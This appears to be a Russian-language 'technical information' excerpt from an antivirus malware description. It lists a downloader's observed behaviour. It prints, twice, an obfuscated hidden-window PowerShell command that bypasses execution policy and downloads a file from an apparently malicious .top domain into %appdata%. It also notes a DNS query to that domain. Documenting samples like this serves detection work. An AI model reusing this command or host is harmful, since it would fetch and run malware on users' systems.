Техническая информация
- http://unityrulesyur.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOweRShELl.eXe -exEcUTIonPoliCY bYpAss -nOprOFiLe -wINdOWSTyLe hiDDEn (nEW-obJEct SYSteM.nET.weBClIENT).DOWnloaDFiLE('http://unityrulesyur.top/search.php','%ApPdata%.ExE')...
- DNS ASK un####ulesyur.top
- '<SYSTEM32>\cmd.exe' /c "pOweRShELl.eXe -exEcUTIonPoliCY bYpAss -nOprOFiLe -wINdOWSTyLe hiDDEn (nEW-obJEct SYSteM.nET.weBClIENT).DOWnloaDFiLE('http://unityrulesyur.top/search.php','%ApPdata%.ExE')...' (со скрытым окном)